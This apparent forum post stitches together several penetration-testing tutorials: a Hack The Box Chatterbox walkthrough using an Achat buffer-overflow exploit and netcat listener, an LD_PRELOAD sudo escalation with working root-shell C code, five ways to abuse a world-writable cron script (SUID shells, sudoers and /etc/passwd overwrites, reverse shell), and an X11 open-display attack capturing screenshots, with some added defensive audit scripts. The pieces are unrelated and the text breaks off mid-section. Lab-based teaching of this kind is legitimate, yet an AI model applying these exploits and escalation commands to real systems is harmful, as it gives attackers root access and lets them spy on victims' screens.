05-14-2020, 08:58 AM
Level: Easy
Task: find user.txt and root.txt file on the victim’s machine.
Penetrating Methodology
- Scanning
- Open ports and Running Services
- Identify Vulnerable service
- Exploiting vulnerable service (Metasploit)
- Get user.txt
- Get root.txt
Since these labs are accessible online, they have static IPs. The IP of Chatterbox is 10.10.10.74, so let’s start with nmap port enumeration.
nmap -p1-10000 10.10.10.74
It showed two open ports but did not identify the services running on them.
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-bZ36aPVQO7s/Wyc4_rprOaI/AAAAAAAAXag/ly0aWeaSPs0r1oGigw2OHYrY4CQT0yoLwCEwYBhgL/s1600/1.png?w=687&ssl=1)
Therefore we turned to Google and searched for exploits related to these ports, as shown in the image below. It turned up two exploits for Achat. First we tried the Metasploit exploit to compromise the victim’s machine and almost succeeded in getting a meterpreter session, but the session died within a few seconds.
So we chose the manual technique to compromise the victim’s machine using Exploit-DB 36025.
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-4aKOYTVq9js/Wyc5Auyzr5I/AAAAAAAAXaw/o-iWljIRf4oWKKYyzRB8pknKwYGgjBjLgCEwYBhgL/s1600/2.png?w=687&ssl=1)
Exploit 36025 is already stored inside Kali Linux, so we copied it to the Desktop.
cd Desktop
cp /usr/share/exploitdb/exploits/windows/remote/36025.py .
cat 36025.py
According to this Python script, the service is vulnerable to a buffer overflow, and the highlighted msfvenom command is used to generate the payload.
![[Image: 12.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-jVyrVw_4H-c/Wyc4_kSgclI/AAAAAAAAXak/TZCaZ7fESloOq0OcW46s8W8okGGLD3EsgCEwYBhgL/s1600/12.png?w=687&ssl=1)
Using the msfvenom command from the script above, we generated the payload and then copied the resulting shellcode.
![[Image: 15.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-I9-vdo_s_jc/Wyc4_uwW6dI/AAAAAAAAXac/vy16qObVmREc7yCajiePgGATTvxDdJ_ywCEwYBhgL/s1600/15.png?w=687&ssl=1)
Now open the original 36025.py saved on the Desktop, paste the copied shellcode into it, and enter the victim’s IP (10.10.10.74) as Server_address. Start a Netcat listener for the reverse connection before running the script.
nc -lvp 1234
![[Image: 16.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-CYz2B_emAk4/Wyc5ATayAeI/AAAAAAAAXbM/FwUBTDNnE6I1YyOYEUcTyir2082NkLwWACEwYBhgL/s1600/16.png?w=687&ssl=1)
Now run the Python script to launch the buffer overflow attack on the victim’s machine.
python 36025.py
BOOM!! Here we have a command shell on the victim’s machine. Let’s finish the task by grabbing both flags.
![[Image: 20.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-4iYJlnOURbw/Wyc5A5cjLgI/AAAAAAAAXbY/Et3oVl9xKxUHZkKv4qqII4aLvKKJLOAdQCEwYBhgL/s1600/20.png?w=687&ssl=1)
Inside C:\Users\Alfred\Desktop we found the user.txt flag and used the type “filename” command to read it.
cd Desktop
type user.txt
Great!! We got our 1st flag successfully.
![[Image: 21.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-wsEwBB_-LrY/Wyc5BXOTOwI/AAAAAAAAXbQ/tqwDIG0HnsASGK4uIH-1mC5bAF3t4CWPACEwYBhgL/s1600/21.png?w=687&ssl=1)
Inside C:\Users\Administrator\Desktop I found the root.txt file and used the type “filename” command to read it.
cd Desktop
type root.txt
But the file could not be read due to insufficient permissions.
![[Image: 22.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-jfj2Oi-dRro/Wyc5BTWjpfI/AAAAAAAAXbU/8D0IkGmxUz4eefyCLec0pIWXttQiraI-QCEwYBhgL/s1600/22.png?w=687&ssl=1)
With the following cacls commands we can view the permissions and change them; here we granted read access on root.txt to user Alfred.
cacls C:\Users\Administrator\Desktop
cacls root.txt /g Alfred:r
type root.txt
Congratulations!! The 2nd task is also completed.
![[Image: 23.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-7Mg7t_7Xw5Q/Wyc5BgJ8XzI/AAAAAAAAXbY/0G3UYfEw-koeufw7wIYRXYhZs63Sg_UaACEwYBhgL/s1600/23.png?w=687&ssl=1)
In this post, we are going to discuss a new privilege escalation technique that exploits the environment variable “LD_PRELOAD”; to practice it you should first take some help from our previous
[To see content please register here]
Table of contents
- Introduction
- Shared Libraries
- Shared Libraries Names
- LD_Preload
- Lab setup
- Privilege Escalation
Shared Libraries
Shared libraries are libraries that are loaded by programs when they start. When a shared library is installed properly, all programs that start afterward automatically use the new shared library.
Shared Libraries Names
Every shared library has a special name called the “soname”. The soname has the prefix “lib”, the name of the library, the phrase “.so”, followed by a period and a version number.
The dynamic linker can be run either indirectly by running some dynamically linked program or shared object. The programs ld.so and ld-linux.so* find and load the shared objects (shared libraries) needed by a program, prepare the program to run, and then run it.
LD_PRELOAD: an environment variable that lists shared libraries with functions that override the standard set, just as /etc/ld.so.preload does. These are implemented by the loader /lib/ld-linux.so.
For more information read from
[To see content please register here]
Lab setup
It is important that the logged-in user has some sudo rights, so we gave the user the right to execute /usr/bin/find via sudo. Apart from that, there is a Defaults specification that lets an environment variable be preserved when running a command under sudo.
To do this follow the below steps:
- Open the /etc/sudoers file by typing visudo
- Now give some sudo rights to a user; in our case “raj” will be a member of sudoers.
raj ALL=(ALL:ALL) NOPASSWD: /usr/bin/find
- Then add the following Defaults specification so that LD_PRELOAD is kept in the environment under sudo.
Defaults env_keep += LD_PRELOAD
![[Image: 2.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-9wRd64dZ_QI/WyKXUs_z5QI/AAAAAAAAXXw/W8Ds1SQlWkYiqFKsskwvbpkKSq1HK1XnACLcBGAs/s1600/2.png?w=687)
Privilege Escalation
To exploit this kind of vulnerability we first need to compromise the victim’s machine and then move to the privilege escalation phase. Suppose you have successfully logged into the victim’s machine through SSH; for post-exploitation, type the sudo -l command to detect it, and notice the highlighted environment variable that is preserved under sudo.
![[Image: 3.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-8_aukc1AvK8/WyKXURVlRkI/AAAAAAAAXXs/CAZK18gYpR0TiFP4Aivw2LKCrJUZdLb8wCEwYBhgL/s1600/3.png?w=687)
Let’s create a C program file inside the /tmp directory.
![[Image: 4.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-B9yPaw7TbHU/WyKXUU2u8iI/AAAAAAAAXXo/pyxfa1xrXn8Pr1il5ziHSB2ppZ2MQN2AACEwYBhgL/s1600/4.png?w=687)
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* prototypes for setuid() and setgid() */

/* _init() runs as soon as the shared object is loaded (built with -nostartfiles). */
void _init() {
    unsetenv("LD_PRELOAD");  /* do not preload this library into the spawned shell too */
    setgid(0);               /* the loading process runs as root under sudo */
    setuid(0);
    system("/bin/sh");
}
Then save it as shell.c inside /tmp.
![[Image: 5.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-H4g6p2ggbfA/WyKXVJnFfCI/AAAAAAAAXYE/jtgOe57paVYSq5EPS7ddVbVRiOFsP3m8gCEwYBhgL/s1600/5.png?w=687)
As discussed, let’s compile it to generate a shared object with the .so extension (the equivalent of a .dll file on Windows) by typing the following:
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
ls -al shell.so
sudo LD_PRELOAD=/tmp/shell.so find
id
whoami
Yuppieeee!!!! We got ROOT access.
![[Image: 6.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-SmdjE6lvzUI/WyKXVZ-5akI/AAAAAAAAXYM/ic2oN4QGsc4xmfyDUrwUMmWV0uL5bDntgCEwYBhgL/s1600/6.png?w=687)
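The sudoers combination that makes the escalation above work is a user specification plus an env_keep line that lets a loader variable through sudo's env_reset. The following audit script is an added example (not part of the original post): it parses sudoers-style text, reports users who can run sudo while LD_PRELOAD (or LD_LIBRARY_PATH / LD_AUDIT) is kept, and shows the corrected file with those variables removed. The sample sudoers content is constructed from the lab setup above.

```python
"""Audit sudoers text for the env_keep LD_PRELOAD weakness described above.

Added example, not from the original post. sudo itself is a setuid
binary, so the loader ignores LD_PRELOAD for sudo; the danger is that a
kept LD_PRELOAD reaches the command sudo then runs as root (here find).
"""
import re

# Loader variables that let the caller inject code into the sudo-run command.
DANGEROUS_ENV = {"LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT"}

# Constructed sudoers content mirroring the lab setup in the post.
SAMPLE_SUDOERS = """\
Defaults env_reset
Defaults env_keep += LD_PRELOAD
raj ALL=(ALL:ALL) NOPASSWD: /usr/bin/find
"""

ENV_KEEP = re.compile(r'^(\s*Defaults\s+env_keep\s*\+?=\s*)"?([^"#]+?)"?\s*(#.*)?$')
USER_SPEC = re.compile(r"^(?P<who>[^\s#]+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?(?P<cmds>.+)$")


def parse_sudoers(text):
    """Return (kept_env_vars, [(user, nopasswd, [commands]), ...])."""
    kept, specs = set(), []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("Defaults"):
            m = ENV_KEEP.match(line)
            if m:
                kept.update(m.group(2).split())
            continue
        m = USER_SPEC.match(line)
        if m:
            cmds = m.group("cmds")
            nopasswd = "NOPASSWD:" in cmds
            cmds = re.sub(r"(?:NO)?PASSWD:\s*", "", cmds)
            specs.append((m.group("who"), nopasswd, [c.strip() for c in cmds.split(",")]))
    return kept, specs


def audit_sudoers(text):
    """One finding per user who can run sudo while a loader variable is kept."""
    kept, specs = parse_sudoers(text)
    risky = sorted(kept & DANGEROUS_ENV)
    if not risky:
        return []
    return [{"user": who, "nopasswd": nopasswd, "commands": cmds, "env_kept": risky}
            for who, nopasswd, cmds in specs]


def harden_sudoers(text):
    """Strip loader variables from every env_keep line; drop the line if it becomes empty."""
    out = []
    for line in text.splitlines():
        m = ENV_KEEP.match(line)
        if m:
            keep = [v for v in m.group(2).split() if v not in DANGEROUS_ENV]
            if not keep:
                continue
            line = m.group(1) + " ".join(keep) + (" " + m.group(3) if m.group(3) else "")
        out.append(line)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print("RISK:", finding)
    print(harden_sudoers(SAMPLE_SUDOERS))
```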
In Linux, everything is a file, including directories and devices, and each file has permissions that allow or restrict three operations: read, write and execute. When an admin sets permissions on a file, he should be aware of which Linux users he is allowing or restricting for each of the three operations.
In this article, we are going to discuss Linux privilege escalation through a writable file/script. To know more about Linux system permissions, read this
[To see content please register here]
Table of contents
Methods to escalate to root via a writable script
- Copy /bin/sh inside /tmp
- Set SUID bit for /bin/dash
- Give ALL permission to logged user through sudoers
- Set SUID bit for /bin/cp
- Malicious code for reverse connection.
Start your attacking machine, first compromise the target system, and then move to the privilege escalation stage. Suppose I have successfully logged into the victim’s machine through SSH and have a non-root user’s terminal. Then, with the following command, we can enumerate all files that are writable by us.
find / -writable -type f 2>/dev/null | grep -v "/proc/"
As you can observe, it showed a Python file stored inside /lib/log. When we explored that path we noticed permission 777 on sanitizer.py.
![[Image: 10.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-pDr6LDm57yY/Wx1bdZm0puI/AAAAAAAAXWA/iLMhI-fioo0Y199gU6dWixlumQf9Ql0fwCLcBGAs/s1600/10.png?w=687&ssl=1)
The following script was added by the admin to clean up all junk files from inside /tmp; this type of script is executed at a specific time interval.
Now if an attacker identifies such a situation on the victim’s machine, he can take over the system by escalating to root privileges in the following ways:
![[Image: 11.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-7RohEEPViYA/Wx1bdVW2UHI/AAAAAAAAXWE/KvH_h9GOK4wIFxE2JWattgA6Bg1lm79MwCLcBGAs/s1600/11.png?w=687&ssl=1)
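Every method below relies on the same defect: a script that root runs on a schedule is writable by an unprivileged user. The following audit is an added example (not part of the original post): it reads system-crontab style lines, resolves the paths each job references, and reports any script whose mode, owner or parent directory would let a non-root user change what root executes. The crontab text and the script files are constructed in a temporary directory so it runs offline.

```python
"""Find scheduled scripts that an unprivileged user could rewrite.

Added example, not from the original post. Lines follow the system
crontab layout (five time fields or @daily, then user, then command).
"""
import os
import stat
import tempfile


def crontab_paths(line):
    """Absolute paths referenced by one crontab line (interpreter and script)."""
    fields = line.strip().split()
    if not fields or fields[0].startswith("#") or "=" in fields[0]:
        return []                                   # comment, blank or VAR=value line
    skip = 2 if fields[0].startswith("@") else 6    # "@daily user" or "m h dom mon dow user"
    return [tok for tok in fields[skip:] if tok.startswith("/")]


def writable_by_others(path, trusted_uid=0):
    """Reasons an untrusted user could alter a file root is about to run."""
    st = os.stat(path)
    reasons = []
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        reasons.append("writable by gid %d" % st.st_gid)
    if st.st_uid != trusted_uid:
        reasons.append("owned by uid %d, not %d" % (st.st_uid, trusted_uid))
    parent = os.stat(os.path.dirname(path))
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        reasons.append("parent directory world-writable without sticky bit")
    return reasons


def audit_crontab(text, trusted_uid=0):
    """Return {path: [reasons]} for every referenced path that fails the checks."""
    findings = {}
    for line in text.splitlines():
        for path in crontab_paths(line):
            if not os.path.exists(path):
                continue
            reasons = writable_by_others(path, trusted_uid)
            if reasons:
                findings[path] = reasons
    return findings


def build_lab():
    """Constructed lab: a 777 cleanup script (the mistake above) and a protected one."""
    d = tempfile.mkdtemp()
    weak = os.path.join(d, "sanitizer.py")
    safe = os.path.join(d, "rotate.py")
    for p in (weak, safe):
        with open(p, "w") as fh:
            fh.write("import os\nos.system('rm -r /tmp/*')\n")
    os.chmod(weak, 0o777)
    os.chmod(safe, 0o755)
    crontab = ("SHELL=/bin/sh\n"
               "*/5 * * * * root python %s\n"
               "@daily root %s\n" % (weak, safe))
    return crontab, weak, safe


def demo():
    """Run the audit against the constructed lab as the current user."""
    crontab, weak, safe = build_lab()
    return audit_crontab(crontab, trusted_uid=os.getuid()), weak, safe


if __name__ == "__main__":
    findings, _, _ = demo()
    for path, why in findings.items():
        print(path, "->", ", ".join(why))
```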
1st Method
There are many ways to gain root access; in this method we copy /bin/sh inside /tmp and set the SUID bit on /tmp/sh. It is quite simple: first open the file in an editor, for example nano sanitizer.py, and replace “rm -r /tmp/*” in the following line with the lines given below.
os.system('cp /bin/sh /tmp/sh')
os.system('chmod u+s /tmp/sh')
![[Image: 13.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-79dxQMw2ABY/Wx1bdSTcqRI/AAAAAAAAXWI/_c6sAOzaD9EcKV8my9f6m4eZqsmdEJngQCLcBGAs/s1600/13.png?w=687&ssl=1)
After some time it will create a shell binary inside the /tmp directory with SUID permission, and when you run it, you will get root access.
cd /tmp
ls
./sh
id
whoami
You can confirm this from the image below.
![[Image: 14.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-GDZM0jX9-Vg/Wx1bd2dVNiI/AAAAAAAAXWM/G6g53pbH5nAoxJaufXSpyHM_ihVCbmh7gCLcBGAs/s1600/14.png?w=687&ssl=1)
2nd Method
Similarly, you can also replace “rm -r /tmp/*” in the following line with the line given below.
os.system('chmod u+s /bin/dash')
![[Image: 15.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-Ecds6shXlAs/Wx1beD6QVdI/AAAAAAAAXWQ/aGM4SJa50_8PKjIXw84zLHqqRAA-MMYuACLcBGAs/s1600/15.png?w=687&ssl=1)
After some time it will set the SUID permission on /bin/dash, and when you run it, it will give root access.
/bin/dash
id
You can confirm this from the image below.
![[Image: 16.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-OK2nDW5a_P0/Wx1beMv104I/AAAAAAAAXWU/XFavphBwDEQV1s0Z6S1d8y_yPtIOAxhlgCLcBGAs/s1600/16.png?w=687&ssl=1)
3rd Method
In this method, we paste Python reverse shell code in place of rm -r /tmp/* and start a netcat listener in a new terminal.
![[Image: 17.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-KtQRAdEBG68/Wx1beVTB7kI/AAAAAAAAXWY/XVJIsCSlBAchAGAJ2WpB35YjV4R0lyLgwCLcBGAs/s1600/17.png?w=687&ssl=1)
As said above, after some time we got the reverse connection through netcat with root access.
nc -lvp 1234
id
whoami
You can confirm this from the image below.
![[Image: 18.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-CRI8_FkjQvo/Wx1bes0_xhI/AAAAAAAAXWc/56HZYXYUy8gkS2yCVN0wH3ja8p_XrRLsgCLcBGAs/s1600/18.png?w=687&ssl=1)
4th Method
Another interesting method is to give sudo rights to the logged-in user by making him a member of the sudoers file. If you look at the image below you can see that currently user wernerbrandes may not run sudo.
![[Image: 19.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-zzfeNd1tqJ4/Wx1begtvi_I/AAAAAAAAXWg/KuxeeRnpSHw4-JcBZgVLV4WiBpPFJhOrQCLcBGAs/s1600/19.png?w=687&ssl=1)
Similarly, you can also replace “rm -r /tmp/*” in the following line with the line given below.
os.system('echo "wernerbrandes ALL=(ALL) NOPASSWD: ALL" > /etc/sudoers')
![[Image: 20.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-VULIjBiQ0KI/Wx1be5PndUI/AAAAAAAAXWk/HL7I68Dft7kowz2cVmJo_WQdoTdCbdsRACLcBGAs/s1600/20.png?w=687&ssl=1)
After some time, when you type the “sudo -l” command you will notice that the user has become a sudoer. To get root access, type “sudo bash” and enjoy root access.
sudo -l
sudo bash
id
5th Method
As we all know, the passwd file plays a very important role in any Linux-like system, and if an attacker gets the chance to modify this file, it becomes a direct way of privilege escalation.
Similarly, we will try something like this with the help of the writable script; here, using the cat command, we can read the /etc/passwd file.
Here you can observe the highlighted record for user nemo; as per my guess, UID 1000 and GID 1000 indicate it would be a member of the admin group.
However, we want to edit nemo’s record to make him a member of root, so select the whole content of /etc/passwd, copy it, and paste it into an empty text file.
![[Image: 22.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-1M-Go-j27ns/Wx1bfaXtyNI/AAAAAAAAXWs/tLfWC6Hcqz4qFbZXmt6OUznne236KYomACLcBGAs/s1600/22.png?w=687&ssl=1)
Then in a new terminal generate a salted password hash with the help of openssl as shown, and copy it.
openssl passwd -1 -salt abc 123
![[Image: 23.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-xYJZmpA7IxE/Wx1bfvBiKyI/AAAAAAAAXWw/Xxnzh6w-JtwXqPuvTn6Cgdee79io_K8SgCLcBGAs/s1600/23.png?w=687&ssl=1)
Now paste the copied salted hash in place of the “x” in user nemo’s record and also change the previous UID and GID to 0:0 as shown in the image. Once all the above steps are completed, save the text file as “passwd”, because when you transfer this file to the victim’s machine it will overwrite the content of the original passwd file.
cd Desktop
python -m SimpleHTTPServer 80
![[Image: 24.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-RS6Cc5CI688/Wx1bf4a_3xI/AAAAAAAAXW0/T8FQgfx1zVk_OHoDa6JQFw_VJk_Sy1UbgCLcBGAs/s1600/24.png?w=687&ssl=1)
Now, taking advantage of the writable script, replace “rm -r /tmp/*” in the following line with the line given below.
os.system('chmod u+s /bin/cp')
After some time it will set the SUID bit on /bin/cp, which can then copy a file anywhere.
![[Image: 25.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-KkxRVimuQxk/Wx1bf3Hx6zI/AAAAAAAAXW4/VstowXj8iGYkNLTyKE8fWx1XtJIfG6FhQCLcBGAs/s1600/25.png?w=687&ssl=1)
Now download your modified passwd file into the /tmp directory of the victim’s machine. Check whether the SUID bit is set on /bin/cp with the following command, then copy the modified passwd file over /etc/passwd with cp, which will overwrite the content of the original passwd file.
cd /tmp
wget
[To see content please register here]
ls -al /bin/cp
cp passwd /etc/passwd
![[Image: 26.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-FSCpOB69mtw/Wx1bgLQwePI/AAAAAAAAXW8/hwfmtVcLFoIyzSnBEsjILVr8xjch4_TegCLcBGAs/s1600/26.png?w=687&ssl=1)
Now let’s confirm whether we have successfully manipulated the content of the passwd file with the following command.
tail /etc/passwd
Wonderful!!! You can observe that the following changes have now become part of the passwd file.
![[Image: 27.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-HP6W0BIJoeg/Wx1bgmomILI/AAAAAAAAXXA/7wlnLPfvu4kAZG5TS1buDbLkJV--kOH5ACLcBGAs/s1600/27.png?w=687&ssl=1)
Now let’s take root access by executing the following commands:
su nemo
password: 123
whoami
So today we have demonstrated how an attacker can achieve privilege escalation through a writable file.
![[Image: 28.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-6kDYMny03bM/Wx1bgqMo9dI/AAAAAAAAXXE/rQz6XDOXJzkc4Inhzo7gQ01UUyBzhVMHgCLcBGAs/s1600/28.png?w=687&ssl=1)
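The overwritten passwd file in the 5th method changes two things a monitor can catch: a hash placed directly in the second field (login uses it instead of /etc/shadow) and a non-root account given UID/GID 0. The following checker is an added example (not part of the original post): it parses passwd records, flags both conditions, and diffs a baseline copy against the current file as a file-integrity monitor would. The sample records are constructed; the hash is a labelled placeholder, not a real digest.

```python
"""Integrity checks for /etc/passwd records, for the overwrite shown above.

Added example, not from the original post. BASELINE and TAMPERED are
constructed; the hash in TAMPERED is a placeholder, not real MD5-crypt output.
"""

BASELINE = """\
root:x:0:0:root:/root:/bin/bash
nemo:x:1000:1000:nemo,,,:/home/nemo:/bin/bash
"""

# Constructed: nemo's record after the 5th method (placeholder hash, UID/GID 0).
TAMPERED = """\
root:x:0:0:root:/root:/bin/bash
nemo:$1$abc$placeholderhashvalue000000:0:0:nemo,,,:/home/nemo:/bin/bash
"""

# Values in field 2 that mean "look in /etc/shadow" or "no login".
SHADOWED = {"x", "*", "!", "!!", ""}


def parse_passwd(text):
    """Map user name -> record dict; raise on malformed lines."""
    records = {}
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 7:
            raise ValueError("line %d: expected 7 fields, got %d" % (n, len(f)))
        records[f[0]] = {"pw": f[1], "uid": int(f[2]), "gid": int(f[3]),
                         "gecos": f[4], "home": f[5], "shell": f[6]}
    return records


def audit_passwd(text):
    """Return [(user, reason)] for records that look like a takeover."""
    findings = []
    for user, r in parse_passwd(text).items():
        if r["pw"] not in SHADOWED:
            findings.append((user, "password hash stored in /etc/passwd, bypasses /etc/shadow"))
        if r["uid"] == 0 and user != "root":
            findings.append((user, "UID 0 on a non-root account"))
        if r["gid"] == 0 and user != "root":
            findings.append((user, "GID 0 on a non-root account"))
    return findings


def diff_passwd(baseline_text, current_text):
    """Return {user: (old_record_or_None, new_record_or_None)} for changed users."""
    old, new = parse_passwd(baseline_text), parse_passwd(current_text)
    changed = {}
    for user in set(old) | set(new):
        if old.get(user) != new.get(user):
            changed[user] = (old.get(user), new.get(user))
    return changed


if __name__ == "__main__":
    for user, why in audit_passwd(TAMPERED):
        print("ALERT %s: %s" % (user, why))
    for user, (before, after) in diff_passwd(BASELINE, TAMPERED).items():
        print("changed:", user, before, "->", after)
```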
X is an architecture-independent system for remote graphical user interfaces and input device capabilities. Each person using a networked terminal can interact with the display using any type of user input device.
Source:
[To see content please register here]
In most cases the X server’s access control is enabled; when it is disabled, it allows anyone to connect to the server. This vulnerability is called X11 Server Unauthenticated Access Open. You can get more information from
[To see content please register here]
For a proper demonstration, we will have to set up an X11 lab with this vulnerability.
Lab Setup
We will use an Ubuntu 14.04 system for this vulnerable lab setup. After the basic installation of the Ubuntu Server (LAMP), we will focus on locating the “lightdm.conf” file.
The Location of this file is: /etc/lightdm/lightdm.conf.
But if you can’t find it at that location, you can get it from
[To see content please register here]
NOTE: All the files we are going to edit are accessible to the root user, and the commands we are going to run are also for the root user. So, to avoid using sudo again and again, we are using a root terminal. To get a root terminal, run the “sudo bash” command in your terminal.
To edit the file, we will use gedit.
gedit /etc/lightdm/lightdm.conf
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-1fBmYVSDt_w/Wx1H9X-F4QI/AAAAAAAAXUg/biipR4ZI6VsCEaldE2zmwwM7T8BAUCvAgCLcBGAs/s1600/1.png?w=687&ssl=1)
To create the vulnerability, we will uncomment the following line in lightdm.conf as shown below:
xserver-allow-tcp=true
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-muTlSKCorJI/Wx1IACK6WfI/AAAAAAAAXVI/B4FMLz1016IRjPdHXazMV4DsG_V9Dzn1wCLcBGAs/s1600/2.png?w=687&ssl=1)
Now that we have saved the changes to the conf file, to make them take effect we will restart the lightdm service.
service lightdm restart
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-VCktbL0Edd8/Wx1IAGqMBJI/AAAAAAAAXVE/ZTu-_rLHUUISkkonWZxfoOexzX-HjIMwgCLcBGAs/s1600/3.png?w=687&ssl=1)
Once the lightdm service has restarted, we disable access control with the following command. This allows any client on the network to connect to the server.
xhost +
And that’s it. We have successfully created the vulnerable X11 server.
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-R9KHBGsZ824/Wx1IARF1oBI/AAAAAAAAXVM/JpzMWXsPayQc1VnFEqpvgqclboaAxiY2gCLcBGAs/s1600/4.png?w=687&ssl=1)
Penetration Testing of X11 Server
To begin penetration testing, we start with enumeration of the vulnerable server. For port enumeration we will use the nmap tool.
nmap -sV 192.168.1.109
![[Image: 5.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-njgBfkwIxTI/Wx1IBITQgAI/AAAAAAAAXVQ/_oeFIyOcR6M8TXkC3Ff31NbhPvmtFo6ewCLcBGAs/s1600/5.png?w=687&ssl=1)
As we can see from the image, TCP port 6000 is open on the server (192.168.1.109) and it is running the X11 service on that port.
Nmap has a script that checks whether the attacker is allowed to connect to the X server. We can check whether the X server allows us to connect as shown below.
nmap 192.168.1.109 -p 6000 --script x11-access
We can clearly see from the image that the X server allows us access.
![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-SPpTT8JJpBs/Wx1IBrhpdBI/AAAAAAAAXVU/7SKdSEUYjboP5UCdnzKoZyl0F5F5HJXmwCLcBGAs/s1600/6.png?w=687&ssl=1)
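What the x11-access script observes is the X11 connection setup: the client sends a setup request with empty authorization and the server answers with a status byte. The following is an added example (not part of the original post, nor nmap's script): it builds that request, parses the reply, and classifies a display as open, denied or requiring authentication, which is also a quick way to confirm that xhost - and removing xserver-allow-tcp=true actually closed the display. probe_display() does the exchange over TCP; the two sample replies are constructed from the protocol's byte layout.

```python
"""X11 connection-setup check, the exchange behind nmap's x11-access.

Added example, not from the original post. Wire format: the client
header is 12 bytes (byte order 'l' for little-endian, protocol 11.0,
auth name/data lengths), the server reply starts with an 8-byte header
whose first byte is 0 = Failed, 1 = Success, 2 = Authenticate.
"""
import socket
import struct


def _pad4(b):
    return b + b"\x00" * ((4 - len(b) % 4) % 4)


def build_setup_request(auth_name=b"", auth_data=b""):
    """Setup request with the given authorization; empty = no credentials."""
    header = struct.pack("<cxHHHHxx", b"l", 11, 0, len(auth_name), len(auth_data))
    return header + _pad4(auth_name) + _pad4(auth_data)


def parse_setup_reply(data):
    """Return (verdict, detail) from the server's setup reply."""
    if len(data) < 8:
        raise ValueError("reply shorter than the 8-byte setup header")
    status, reason_len, major, minor, _extra = struct.unpack("<BBHHH", data[:8])
    if status == 1:
        return "open", "X%d.%d accepted a connection with no authorization" % (major, minor)
    if status == 0:
        return "denied", data[8:8 + reason_len].decode("ascii", "replace")
    if status == 2:
        return "authenticate", data[8:].rstrip(b"\x00").decode("ascii", "replace")
    return "unknown", "status byte %d" % status


def probe_display(host, port=6000, timeout=3.0):
    """Connect to host:port (display :0 is TCP 6000) and classify the reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_setup_request())
        return parse_setup_reply(s.recv(4096))


# Constructed replies: a success header (extra data omitted) and the usual refusal.
REPLY_OPEN = struct.pack("<BBHHH", 1, 0, 11, 0, 8) + b"\x00" * 32
_reason = b"No protocol specified"
REPLY_DENIED = (struct.pack("<BBHHH", 0, len(_reason), 11, 0, len(_pad4(_reason)) // 4)
                + _pad4(_reason))


if __name__ == "__main__":
    print(parse_setup_reply(REPLY_OPEN))
    print(parse_setup_reply(REPLY_DENIED))
```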
XWININFO
This is a built-in utility in Kali that shows window information for the X service. xwininfo can be used to get information about the windows open on the target system.
xwininfo -root -tree -display 192.168.1.109:0
- -root: specifies that X’s root window is the target window
- -tree: displays the names of the windows
- -display: specifies the server to connect to
From the output we learn that:
- The victim has Gnome Terminal open
- The victim is a VMware user
- The victim has Nautilus (the Ubuntu file browser) open
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-r699bHo91gw/Wx1ICGkASOI/AAAAAAAAXVY/FIxljA_AhKYO5sGLKGEfRdqC-CDiP5UvACLcBGAs/s1600/7.png?w=687&ssl=1)
XWD
It is an X Window System utility for taking screenshots. On our Kali system we use xwd to take a screenshot of the X server. This utility saves screenshots in xwd format.
xwd -root -screen -silent -display 192.168.1.109:0 > screenshot.xwd
- -root: indicates that the root window should be selected for the window dump
- -screen: indicates that the GetImage request used to obtain the image should be done on the root window rather than directly on the specified window
- -silent: operate silently, i.e. don’t ring any bells before and after dumping the window
- -display: specifies the server to connect to
